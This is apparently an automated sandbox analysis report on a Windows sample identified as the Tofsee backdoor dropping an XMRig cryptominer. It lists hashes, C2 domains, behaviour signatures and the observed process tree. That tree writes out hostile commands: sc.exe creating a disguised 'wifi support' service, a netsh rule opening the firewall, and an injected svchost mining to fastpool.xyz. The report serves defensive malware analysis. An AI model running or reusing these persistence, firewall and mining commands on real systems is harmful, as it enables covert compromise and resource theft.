Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-05-2023 08:51

General

  • Target

    file.exe

  • Size

    285KB

  • MD5

    a21e695f7a2af53e5208781c8a75da08

  • SHA1

    ad5000552a0b6dd28c8909287477ea9834b5ef48

  • SHA256

    f61b790784033096fb5f18ac2c17fa89b99a8ecebdd0e30148fe10133d42e8c0

  • SHA512

    875e52bd6bf5d15472adbf9a9a97f73c2af33e4629c54a43e3de4da41cad638ae27c55275725d3fc9400d690c3f4060161e52c928cdcc0b52be7838d8b952f59

  • SSDEEP

    6144:i2W+rLe/H5vsW/n/8d2f3f0nxcVoR9tw:i23y/Z0u/pf3Axc+hw

Malware Config

Extracted

Family

tofsee

C2

vanaheim.cn

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Creates new service(s) 1 TTPs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\kgucndpc\
      2⤵
        PID:3044
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\htjwkjbf.exe" C:\Windows\SysWOW64\kgucndpc\
        2⤵
          PID:2608
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create kgucndpc binPath= "C:\Windows\SysWOW64\kgucndpc\htjwkjbf.exe /d\"C:\Users\Admin\AppData\Local\Temp\file.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:3912
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description kgucndpc "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:3940
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start kgucndpc
          2⤵
          • Launches sc.exe
          PID:2736
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:1044
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 1188
          2⤵
          • Program crash
          PID:2460
      • C:\Windows\SysWOW64\kgucndpc\htjwkjbf.exe
        C:\Windows\SysWOW64\kgucndpc\htjwkjbf.exe /d"C:\Users\Admin\AppData\Local\Temp\file.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:528
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:3548
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.70000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1504
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 528 -s 520
          2⤵
          • Program crash
          PID:4404
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4464 -ip 4464
        1⤵
          PID:3284
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 528 -ip 528
          1⤵
            PID:2472

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Persistence

          New Service

          1
          T1050

          Modify Existing Service

          1
          T1031

          Registry Run Keys / Startup Folder

          1
          T1060

          Privilege Escalation

          New Service

          1
          T1050

          Defense Evasion

          Modify Registry

          1
          T1112

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          2
          T1082

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\htjwkjbf.exe
            Filesize

            13.7MB

            MD5

            971afa80170af978fdefa23e9e15be4e

            SHA1

            765ed0062f02278f33306a8fa352951a67059a9f

            SHA256

            274c738edaa02cf3c634521820835e3c327532859a83bfc61825a9b5839152bb

            SHA512

            87cff9a18229c26d212a8c5a1ca5f70ca78b7b46ccfda708916da2f269170372d2bcebbe951943524f7145ca942f9838d176d1318ce18b8583c0da6d98d134a5

          • C:\Windows\SysWOW64\kgucndpc\htjwkjbf.exe
            Filesize

            13.7MB

            MD5

            971afa80170af978fdefa23e9e15be4e

            SHA1

            765ed0062f02278f33306a8fa352951a67059a9f

            SHA256

            274c738edaa02cf3c634521820835e3c327532859a83bfc61825a9b5839152bb

            SHA512

            87cff9a18229c26d212a8c5a1ca5f70ca78b7b46ccfda708916da2f269170372d2bcebbe951943524f7145ca942f9838d176d1318ce18b8583c0da6d98d134a5

          • memory/528-147-0x0000000000400000-0x0000000002363000-memory.dmp
            Filesize

            31.4MB

          • memory/1504-191-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-202-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-200-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-201-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-199-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-198-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-197-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/1504-196-0x0000000000A00000-0x0000000000AF1000-memory.dmp
            Filesize

            964KB

          • memory/3548-170-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-177-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-159-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-163-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-162-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-164-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-167-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-165-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-168-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-166-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-169-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-143-0x00000000008B0000-0x00000000008C5000-memory.dmp
            Filesize

            84KB

          • memory/3548-172-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-171-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-173-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-174-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-175-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-156-0x0000000001BE0000-0x0000000001BE6000-memory.dmp
            Filesize

            24KB

          • memory/3548-176-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-178-0x0000000001BF0000-0x0000000001C00000-memory.dmp
            Filesize

            64KB

          • memory/3548-179-0x00000000029D0000-0x00000000029D5000-memory.dmp
            Filesize

            20KB

          • memory/3548-182-0x00000000029D0000-0x00000000029D5000-memory.dmp
            Filesize

            20KB

          • memory/3548-183-0x0000000007440000-0x000000000784B000-memory.dmp
            Filesize

            4.0MB

          • memory/3548-186-0x0000000007440000-0x000000000784B000-memory.dmp
            Filesize

            4.0MB

          • memory/3548-187-0x00000000029E0000-0x00000000029E7000-memory.dmp
            Filesize

            28KB

          • memory/3548-155-0x0000000002400000-0x000000000260F000-memory.dmp
            Filesize

            2.1MB

          • memory/3548-152-0x0000000002400000-0x000000000260F000-memory.dmp
            Filesize

            2.1MB

          • memory/3548-151-0x00000000008B0000-0x00000000008C5000-memory.dmp
            Filesize

            84KB

          • memory/3548-149-0x00000000008B0000-0x00000000008C5000-memory.dmp
            Filesize

            84KB

          • memory/3548-148-0x00000000008B0000-0x00000000008C5000-memory.dmp
            Filesize

            84KB

          • memory/3548-146-0x00000000008B0000-0x00000000008C5000-memory.dmp
            Filesize

            84KB

          • memory/4464-138-0x00000000024F0000-0x0000000002503000-memory.dmp
            Filesize

            76KB

          • memory/4464-142-0x0000000000400000-0x0000000002363000-memory.dmp
            Filesize

            31.4MB